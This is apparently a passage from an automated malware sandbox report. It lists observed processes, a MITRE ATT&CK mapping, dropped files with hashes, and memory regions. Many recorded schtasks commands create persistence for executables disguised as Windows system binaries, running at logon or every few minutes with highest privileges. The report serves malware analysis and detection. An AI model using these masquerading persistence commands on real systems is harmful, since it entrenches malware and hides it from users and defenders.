C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4428

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3744

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Reference Assemblies\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Reference Assemblies\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2852

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\containerperf\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2956

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\containerperf\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\containerperf\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\containerperf\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\containerperf\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\containerperf\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1688

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Multimedia Platform\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDllS" /sc MINUTE /mo 9 /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDll" /sc ONLOGON /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "ServerComponenthostMonitorDllS" /sc MINUTE /mo 10 /tr "'C:\containerperf\ServerComponenthostMonitorDll.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:5384

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:5528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:5860

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:5932

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
PID:3444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e809c82a527506d89f5b1cd5efbbe8be

SHA1
202df360d19813dd9280747f7ea048802e7bb8b8

SHA256
e92e8f84a105adcf242d54dfb5acab6a9ac75ed54e768a6d7b0511345f3ce8c7

SHA512
d1f01631a17edbe3f37876f2ec6bca66119b321a86d733633f90c9337b32fb5e66d3c7bc36eb6873504f844ce3e7687c0375b1865eb70b8b53edfe632eff3e74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e8ce785f8ccc6d202d56fefc59764945

SHA1
ca032c62ddc5e0f26d84eff9895eb87f14e15960

SHA256
d85c19fc6b9d25e2168a2cc50ff38bd226fbf4f02aa7ac038a5f319522d2ffa4

SHA512
66460aec4afee582556270f8ee6048d130a090f1c12a2632ed71a99a4073e9931e9e1cc286e32debffb95a90bd955f0f0d6ec891b1c5cd2f0aae41eb6d25832f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
607d8291c717d0b40e63a94c2819c4db

SHA1
cf1eefbbc5414144d227da05df4eebb71d86f029

SHA256
fe5792b7330b409db25fb4eacb6d57bb56798959122319107f9faa69dd9de2cc

SHA512
f480466e8b0fc939189eb6d0efb17484922c88fa8af5adbc6c2ec031bc6e2a2a20ae7b223f7724d4171a06253321dbaad147238bf1fd2694ead717dd29a414ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\KgNMYgAYwL.bat

Filesize
231B

MD5
25b8a2b29b53e185bb0504506cc5235c

SHA1
680ea8e7a6065043e01c278993b1744da2fc34af

SHA256
6cf06ec4566927553777ef0bba20b5b9616f15960f8da5b7b827888bdc585410

SHA512
c626c620eee429d97c90b32a3727a8931c0e8c6eb7d50a6b7464220ab5492410ae092481d3a14facf8d87c449f522701e0d26b9329107223eb2111f93956605e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB9F9.tmp

Filesize
1KB

MD5
c657e77ead8001dd86c8ab96032bb0cb

SHA1
001144527d665535e67c5ac276f89695dbaec8ce

SHA256
1c384708fb06355f699e32d20cee6c5fcbc5f91b9cf527a781a1139e81d3284c

SHA512
adfc9bb0743a47a159ec3a22b50c2052729cc9f5e95714e96b995806be9f587131ea1254ee48a11194fba27d3bf7ece04586e3aa045538c1fa5dfd92391cfa51

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zmzzjuyy.nzk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\twain_32.exe

Filesize
5.7MB

MD5
1ff26b7d334cd22e726caf72a4208b96

SHA1
d2a1ad17e27c01072ac41d4d20426dd5ca7554ad

SHA256
56ece6be060502193ed0360a8ff7d0633dc7e88d133b28b8a73dfb755d2134db

SHA512
787b02b048dad824dd216a0b33872b2012fc8b2c47d831a33c4eb05399df9a253bd30a8789659a7da0eea8535bb78705685ac67ae546d2f10210c7ba552b4f49

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat

Filesize
200B

MD5
705bbadbf818277ddd38afa10533756b

SHA1
1d5fb39c2793854e8c7d848798e39c659aa3e22d

SHA256
871ef6a27bc10a920ce0890b50bf9926b7dbd4eea19a97a19bb837be7a97e5f3

SHA512
f8c46c4e4e31445a397af9f437b86b15edd48047c24f9c78f0e49efa28ea293465cb7aef242e71b2d127deba3827aee8f00c7cc11085f8c05a771b1cfbf36c31

Download Submit
C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe

Filesize
230B

MD5
3ef9810ceb57153ab80dd204f33e7f91

SHA1
3fd4057ecad16cf11f2cab6d0ad44be3bd4b0e3f

SHA256
d88a8b553f99f796c80a9e7cc41534b43fab45c7b13fd1d52c9b580d541a272e

SHA512
e65cad2c807bf012d13842dac72bd2436d182702fc7bb7fb212487b322a9442504a7c1f42df57e760ac24c322b810ba8c2ffa616dd2acdfb8098bdb5e8012fe9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4pzibiiw\4pzibiiw.0.cs

Filesize
387B

MD5
48ad701d661d8d68561db94bc059f2db

SHA1
6476ad20626dd5fdfc421605cbe6750f998299b0

SHA256
b666935cefc33fd4a41d380a5fc635d5e1dc691fdcaee3fbacdf4e897454ea66

SHA512
c101d48275888498ba9c612c099b540d9d51a938e4598d909c7cdede2aed30d456dd1aa6793d2e70d1e806bbcd1c671fb6c5a6c4caa4507d5f1a2c2b4ab4a8f5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4pzibiiw\4pzibiiw.cmdline

Filesize
235B

MD5
c1eea9afd03f75d73a3994f55aa3cdd9

SHA1
d52322ad8acdafc38a7ad1f7cf20e332bef7b395

SHA256
dd51e4bed486b474b152cb98b5d10864592eff794e58ed1988e0650e3af3e155

SHA512
7b101861fa53d30ea80f4fca86ab5ab4c33a40d8b9cd47cd0144aa3d716cb0b051c01c3ea2c9475f2d8afbccabe0e6fa523bbadc208182d693d74f3f40cde8a1

Download Submit
\??\c:\Windows\System32\CSC42BBDE5C5DD497CBA9CA7C2A7BC9B6.TMP

Filesize
1KB

MD5
65d5babddb4bd68783c40f9e3678613f

SHA1
71e76abb44dbea735b9faaccb8c0fad345b514f4

SHA256
d61a59849cacd91b8039a8e41a5b92a7f93e2d46c90791b9ba6b5f856008cd8f

SHA512
21223e9a32df265bb75093d1ebaa879880a947d25ac764f3452b9104893b05f2c8fe4150cb2465681df7a0554dcefdb7f623aaf54772ade878270f453ebc1bcf

Download Submit
memory/64-332-0x00007FF8B9F10000-0x00007FF8B9F20000-memory.dmp

Filesize
64KB

Download
memory/64-331-0x0000021640960000-0x0000021640987000-memory.dmp

Filesize
156KB

Download
memory/612-323-0x0000020941270000-0x0000020941291000-memory.dmp

Filesize
132KB

Download
memory/612-327-0x00000209412A0000-0x00000209412C7000-memory.dmp

Filesize
156KB

Download
memory/612-328-0x00007FF8B9F10000-0x00007FF8B9F20000-memory.dmp

Filesize
64KB

Download
memory/668-334-0x0000023269700000-0x0000023269727000-memory.dmp

Filesize
156KB

Download
memory/668-335-0x00007FF8B9F10000-0x00007FF8B9F20000-memory.dmp

Filesize
64KB

Download
memory/1008-311-0x00007FF8F9E90000-0x00007FF8FA085000-memory.dmp

Filesize
2.0MB

Download
memory/1008-312-0x00007FF8F8520000-0x00007FF8F85DE000-memory.dmp

Filesize
760KB

Download
memory/1060-906-0x00000215ABDB0000-0x00000215ABE65000-memory.dmp

Filesize
724KB

Download
memory/1992-663-0x000001D06D080000-0x000001D06D09A000-memory.dmp

Filesize
104KB

Download
memory/1992-662-0x000001D06D020000-0x000001D06D02A000-memory.dmp

Filesize
40KB

Download
memory/1992-657-0x000001D06CE00000-0x000001D06CE1C000-memory.dmp

Filesize
112KB

Download
memory/1992-660-0x000001D06D040000-0x000001D06D05C000-memory.dmp

Filesize
112KB

Download
memory/1992-664-0x000001D06D030000-0x000001D06D038000-memory.dmp

Filesize
32KB

Download
memory/1992-665-0x000001D06D060000-0x000001D06D066000-memory.dmp

Filesize
24KB

Download
memory/1992-659-0x000001D06CBB0000-0x000001D06CBBA000-memory.dmp

Filesize
40KB

Download
memory/1992-658-0x000001D06CE20000-0x000001D06CED5000-memory.dmp

Filesize
724KB

Download
memory/1992-666-0x000001D06D070000-0x000001D06D07A000-memory.dmp

Filesize
40KB

Download
memory/2784-84-0x0000021AB6090000-0x0000021AB60B2000-memory.dmp

Filesize
136KB

Download
memory/4380-309-0x00007FF6E56B0000-0x00007FF6E5C71000-memory.dmp

Filesize
5.8MB

Download
memory/4380-260-0x00007FF6E56B0000-0x00007FF6E5C71000-memory.dmp

Filesize
5.8MB

Download
memory/4808-0-0x0000000000400000-0x0000000000B63000-memory.dmp

Filesize
7.4MB

Download
memory/4808-21-0x0000000000400000-0x0000000000B63000-memory.dmp

Filesize
7.4MB

Download
memory/4892-37-0x0000000003230000-0x000000000323E000-memory.dmp

Filesize
56KB

Download
memory/4892-39-0x000000001BD90000-0x000000001BDAC000-memory.dmp

Filesize
112KB

Download
memory/4892-40-0x000000001C120000-0x000000001C170000-memory.dmp

Filesize
320KB

Download
memory/4892-42-0x000000001C0D0000-0x000000001C0E8000-memory.dmp

Filesize
96KB

Download
memory/4892-44-0x000000001BC20000-0x000000001BC2E000-memory.dmp

Filesize
56KB

Download
memory/4892-46-0x000000001BC30000-0x000000001BC3C000-memory.dmp

Filesize
48KB

Download
memory/4892-48-0x000000001BDB0000-0x000000001BDBE000-memory.dmp

Filesize
56KB

Download
memory/4892-35-0x0000000000E60000-0x0000000001058000-memory.dmp

Filesize
2.0MB

Download
memory/4892-50-0x000000001C0F0000-0x000000001C0FC000-memory.dmp

Filesize
48KB

Download